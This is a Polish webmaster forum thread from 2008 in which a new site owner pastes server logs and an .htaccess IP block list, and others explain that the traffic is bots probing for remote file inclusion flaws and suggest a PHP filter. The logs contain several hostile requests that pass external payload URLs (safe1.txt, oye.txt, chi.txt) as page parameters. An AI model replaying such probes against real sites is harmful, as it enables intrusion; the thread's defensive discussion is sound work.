strona istnieje 4 godziny i juz ja zajechaly roboty

pandha · 7 Września 2008

heja. mam stronke, zyje sobie od 4 godzin i nagle widze ze zablokowana bo za bardzo obciaza serwer..... sprawdzilem w logach [ogromy plik] i okazuje sie mnostwo botow ja napadlo. dziwi mnie po pierwsze skad jak dopadli ale do rzeczy

w htaccess wpisalem:

Order Allow,Deny

Allow from all

# wiekszosc to pliki oye.txt.

# sa tez safe1.txt i wiele innych

Deny From 69.65.117.72

Deny From 74.200.91.47

Deny From 98.129.92.58

Deny From 74.200.91.47

Deny From 24.242.184.98

Deny From 85.114.130.117

Deny From 209.97.201.206

Deny From 89.248.110.152

Deny From 70.86.81.114

Deny From 69.10.136.171

to nie jest cala lista, ale ciezko je mi spisac z logow. pojawiaja sie za to adresy xxx/xxx/x/oye.txt i tym podobne

moge blokowac jakos po slowie?

na pio byly wczesniej posty podobne ale jak kopiuje je do siebie to mam internal error 500

przykladowe wpisy

87.230.10.231 - - [07/Sep/2008:18:58:58 -0500] "GET /?page=https://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 25600 "-" "libwww-perl/5.803"

74.200.91.47 - - [07/Sep/2008:18:59:30 -0500] "GET /xzclf/2/posts/7_Udz...epetycji/32_J_zyk_polski//?view=page&pagename=https://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 200 310 "-" "libwww-perl/5.810"

69.65.117.72 - - [07/Sep/2008:18:59:33 -0500] "GET /xzclf/11/posts/5//?view=page&pagename=https://www.setteb.it/chi.txt?? HTTP/1.1" 200 310 "-" "libwww-perl/5.813"

co te pliki wlasciwie robia?

pozdr i dzieki za pomoc

exa · 7 Września 2008

Są to boty szukające błędów include. Takich botów są tysiące i statystycznie atakują pewnie każdą zaindeksowaną witrynę w sieci. Jest banalnie prosta i skuteczna metoda walki. Żeby uratować zasoby serwera i transfer wystarczy w pierwszych liniach naszych głównych skryptów wkleić coś takiego:

<?php
if(!empty($_SERVER['REQUEST_URI']) && strstr($_SERVER['REQUEST_URI'], 'https://') !== false)
  die('STOP: BOT');
?>

Dla każdego zapytania, w którym znajdzie się ciąg znaków 'https://' przerywamy działanie skryptu.

Dla przykładu dla zapytania:

https://mojastrona.pl/index.php?page=https://costam/bug

Zmienna $_SERVER['REQUEST_URI'] wygląda tak:

/index.php?page=https://costam/bug

Proste i skuteczne.

pandha · 7 Września 2008

dzieki, zaraz to zrobie... choc wlasnie zobaczylem zamiast strony

Warning: mysql_connect() [function.mysql-connect]: User xxx_xxxx has already more than 'max_user_connections' active connections in /home/edukacja/public_html/xxx/config.inc.php on line 311
Cannot connect to DB

a myslalem ze powinno byc ok...

66.249.71.147 - - [07/Sep/2008:15:27:07 -0500] "GET /xzclf/5/events/2009-1-29/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.148 - - [07/Sep/2008:15:28:29 -0500] "GET /xzclf/-1/posts/7_Udziel_korepetycji/25_Chemia/?search=zrozumieniu&x%5B6%5D=Egzaminy%20wst%EApne HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.147 - - [07/Sep/2008:15:28:38 -0500] "GET /xzclf/21/events/2005-10-25/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
74.6.22.162 - - [07/Sep/2008:15:28:38 -0500] "GET /xzclf/-1/posts/7_Udziel_korepetycji/37_Matematyka/5250_Student_udzieli_korepetycji_z_matematyki.html HTTP/1.0" 200 298 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; https://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.162 - - [07/Sep/2008:15:28:52 -0500] "GET /xzclf/11/events/2007-5-04/ HTTP/1.0" 200 298 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; https://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.149 - - [07/Sep/2008:15:29:51 -0500] "GET /xzclf/21/events/2008-3-25/ HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.147 - - [07/Sep/2008:15:30:15 -0500] "GET /xzclf/12/events/2007-6-25/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.149 - - [07/Sep/2008:15:31:12 -0500] "GET /xzclf/16/events/2008-03-28/ HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.147 - - [07/Sep/2008:15:31:53 -0500] "GET /xzclf/22/events/2005-10-06/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.147 - - [07/Sep/2008:15:32:34 -0500] "GET /xzclf/-1/posts/7_Udziel_korepetycji/25_Chemia/?search=matematyka&x%5B6%5D=Wszystkie%20poziomy HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
91.121.153.149 - - [07/Sep/2008:15:32:59 -0500] "GET /rss.php?view=ads&catid=1&subcatid=0&cityid=-1 HTTP/1.0" 200 298 "-" "MagpieRSS/0.72 (+https://magpierss.sf.net)"
82.2.13.138 - - [07/Sep/2008:15:33:09 -0500] "GET / HTTP/1.1" 301 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.2.13.138 - - [07/Sep/2008:15:33:10 -0500] "GET / HTTP/1.1" 200 310 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.2.13.138 - - [07/Sep/2008:15:33:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
66.249.71.148 - - [07/Sep/2008:15:33:31 -0500] "GET /xzclf/13/events/2005-10-17/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.148 - - [07/Sep/2008:15:33:56 -0500] "GET /xzclf/12/events/2009-2-27/ HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"
66.249.71.149 - - [07/Sep/2008:15:35:10 -0500] "GET /xzclf/14/events/2008-06-19/function.mysql-connect HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)"

hm, wkleilem kilka ostatnich informacji z logow. wg mnie nikogo nie bylo na stronie, tylko praktycznie google bot [dlaczego tak czesto jest, praktycznie co minute]. wiek ktos co to jest to GECKO?

pozd i dzieki za pomoc

-=SnU=- · 8 Września 2008

wiek ktos co to jest to GECKO?

silnik wyświetlania stron internetowych wykorzystywany przez Firefoxa

pl.wikipedia.org/wiki/Gecko

pandha · 8 Września 2008

dzieki, juz wyguglowalem ;P

tak przy okazji mialem 700 odwiedzin googlebota w przeciagu kilku godzin. to chyba nie normalnie nie?

Maximus Marius · 8 Września 2008

A domena jest nowa czy z drugiej reki ? Każdy może przedstawić sie jako google bot , trzeba by sprawdzić rev DNS-y aby miec pewność.

Jak podasz domenę to będzie można coś więcej powiedzieć .

Zaloguj się

strona istnieje 4 godziny i juz ja zajechaly roboty

Rekomendowane odpowiedzi

pandha

Odnośnik do komentarza

Udostępnij na innych stronach

exa

Odnośnik do komentarza

Udostępnij na innych stronach

pandha

Odnośnik do komentarza

Udostępnij na innych stronach

-=SnU=-

Odnośnik do komentarza

Udostępnij na innych stronach

pandha

Odnośnik do komentarza

Udostępnij na innych stronach

Maximus Marius

Odnośnik do komentarza

Udostępnij na innych stronach

Zarchiwizowany

Ostatnio przeglądający 0 użytkowników

Polecamy

Senuto

netBOMB.pl
dariuszjurek.pl
noclegi.biz.pl
www.zgred.pl

Współpracują z nami

SEOsklep24.pl
Zdalny Admin

Przeglądaj

Cała aktywność

Twoje kanały aktywności

Powiadomienie o plikach cookie